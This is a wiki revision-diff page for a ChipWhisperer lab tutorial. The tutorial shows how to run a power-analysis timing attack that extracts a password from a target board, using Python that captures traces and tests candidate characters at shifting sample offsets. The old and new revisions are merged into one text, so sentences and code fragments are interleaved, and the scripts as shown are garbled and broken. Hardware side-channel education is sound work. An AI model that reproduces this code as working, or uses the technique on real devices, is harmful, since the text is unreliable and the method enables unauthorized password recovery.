Changes

Performing the Timing Attack: Finished overhaul
<li>Close any open ChipWhisperer-Capture windows, and run the script as before. You should connect to the target, and be able to press ''Capture 1'' and see the correct waveform.</li>
</ol>
 
== Running a Single Capture ==
With our settings prepared, the next step is to use our script to record and analyze a power trace. We need to be able to get the trace data into our Python script so we can analyze it for the timing attack.
 
The API allows us to ''press the Capture 1'' button and ''view the power trace'' without using the GUI. There are two relevant commands here:
* <code> self.api.capture1()</code> acts as if we've just pressed the ''Capture 1'' button;
* <code> self.api.getScope().datapoints</code> stores a list of datapoints that were recorded in the previous capture.
We want to test these two commands. After the setup portion of your script, add some code similar to the following:
<pre>
self.api.capture1()
data = self.api.getScope().datapoints
print data
</pre>
Run your script. The ChipWhisperer should automatically capture one trace and print out the several thousand datapoints. This is all we need to continue.
 
== Attacking a Single Letter ==
Now that we can record one power trace, we can start the timing attack. Our goal here is to automatically find the first letter of the Super Secret (tm) password.
== Attacking <li><p>Look at this example of the Full Password ==The last step is power traces when 0 and 1 bytes are correct. We can see a clear point that appears to attack shift forward in time:</p><blockquote><p>[[File:Passwordcrackerpts.png|image]]</p></blockquote><p>When we guess the entire passwordfirst byte incorrectly, one letter at there is a distinct power spike at sample number 153. However, when we guess correctly, the target spends more timeprocessing the password, and this spike moves 72 samples forward. This means that we can check if our first byte is correct by checking this data point: if we're right, it will have an amplitude greater than -0.2. Note the specific point will change for different hardware, and may also change if you use different versions of avr-gcc to compile the target code. The example code here was compiled with WinAVR 20100110, which has avr-gcc 4.3.3. If you view the video version of this tutorial the point numbers are different for example, so be sure to check what they are for your specific system.</p></li>
     <li><p>Next, we will automatically start attacking Add a loop to your script that does the system. You needed following:* Sets the ''Go Command'' to figure out where we will look to determine if the password check is working. Looking at an example of the power when 0 and 1 bytes are correct, next character we can see a good point that appears want to shift forward in time:</p>try<blockquote><p>[[File:Passwordcrackerpts.png|image]]</p></blockquote>* Captures a power trace<p>This point corresponds to an offset of * Checks if sample 153 samples, and a delta for each character of 72 pointsis above -0. Note 2 (fill in the specific point will change appropriate numbers here)* Repeats for different hardware, and may also change if you use different versions of avr-gcc all characters we want to compile the target code. The tryAn example code here was compiled with WinAVR 20100110, which has avr-gcc 4.3.3. If you view the video version of this tutorial the point numbers are different for example, so be sure to check what they are for your specific system.</p><p>Let's start with cracking just the first character, assuming it's a lowercase alphanumeric characterloop is:</p><pre>trylist = &quot;abcdefghijklmnopqrstuvwyx0123456789&quot;'abcdefghijklmnopqrstuvwxyz0123456789'
for c in trylist:
cap# Test this password and record a power trace self.api.setParameter(['Target ConnectionSimple Serial', 'Go Command', u'%c\+ '\n'%c]) capself.api.capture1() # Get the data and check data[153] data = self.api.getScope().datapoints if data[153] > -0.2: print "Success: " + c </pre>This script will eventually stop, but you can use Ctrl+C on the command line to kill it. Make sure your script prints "Success: h"!</li>
#TODO: Check data to see if successful??
print &quot;Try = %c&quot;%c
#Call == Attacking the Full Password ==The last step is to pe() causes GUI attack the entire password, one letter at a time. The procedure to process outstanding events, useful if you are calling API directlydo this is: pe()</pre></li>* Start with a blank password string<li>We haven't yet pragmatically tested * Loop through all of the results, but run characters we want to try:** Add the script anyway (next character to kill it, you'll have to use Ctrl-C on the terminal window). You should notice a distinct change end of the power signature when it runs through &quot;Try = h&quot;.</li>password<li><p>We can access <** Test this new candidate password using code>capsimilar to the above** If the new password is correct up to character (1, 2, .scope.datapoints</code> ., 5), add it to get the data points. Let's print that point end of interest (again change the point for your specific setup):</p>password<pre>for c in trylist: cap.setParameter([* Repeat until we'Target Connection', 'Go Command', u'%c\\n'%c]) capve cracked all 5 characters.capture1()
#TODO: Check data to see if successful?? print &quot;Try = %c&quot;%c print capNote that the point of interest is no longer at sample 153.scope.datapoints[We noticed earlier that this key point moves 72 samples forward for every correct character, so we'll have to check location <code>153]</code> for character 0, <code>153 + 72</code> for character 1, and <code>153 + i*72</code> for character <code>i</code>.
#Call to pe() causes GUI to process outstanding events, useful if you are calling API directly pe()</pre></li><li><p>Running that An example, you can see we can use a simple threshold to detect the correct password. Finally use the following paying careful attention that you firstof this loop is:</p><blockquote><ulpre><li>Check the offset and delta values (here they are 153 and 72)</li><li>Note that the &quot;Go Command&quot; has been modified to send the known password characters, otherwise it won= ''t work in a progressive manner.</li></ul></blockquote><p>The following is a sample code you can replace the previous with:</p><pre>password trylist = &quot;&quot;'abcdefghijklmnopqrstuvwxyz0123456789' for i in range(0,5): print &quot;***CHARACTER %d***&quot;%i
for c in trylist:
cap# Get a power trace using our next attempt nextPass = password + '{}'.format(c) self.api.setParameter(['Target ConnectionSimple Serial', 'Go Command', password + &quot;%c\'{}\n&quot;%c'.format(nextPass)]) capself.api.capture1() print &quot;Try = %c&quot;%c# Grab the trace #print capnextTrace = self.scopeapi.getScope().datapoints[ # Check location 153 + i*72], 225, etc. If it's too low, we've failed if cap.scope.datapointsnextTrace[153 + 72*i*72] &gt; < -0.2: print &quot;****CHARACTER %d = %c****&quot;%(icontinue # If we got here, c)we've found the right letter password += c break  elif c == &quot;9&quot;print '{} characters: print &quot;****CHARACTER %d FAILED****&quot;%{}'.format(i) +1, password += &quot;?&quot;  #Call to pe() causes GUI to process outstanding events, useful if you are calling API directly pe() break print password</pre>After some time, this prints </licode>5 characters: h0px3</olcode>-- it automatically finds the correct password.
That's it! You should have successfully cracked a password using the timing attack. Some notes on this method:
<blockquote>* The target device has a finite start-up time, which slows down the attack. If you wish, remove some of the printf()'s from the target code, recompile and reprogram, and see how quickly you can do this attack.
* The current script doesn't look for the &quot;WELCOME&quot; message when the password is OK. That is an extension that allows it to crack any size password.
* If there was a lock-out on a wrong password, the system would ignore it, as it resets the target after every attempt.
</blockquote>
= Conclusion =
Approved_users
510
edits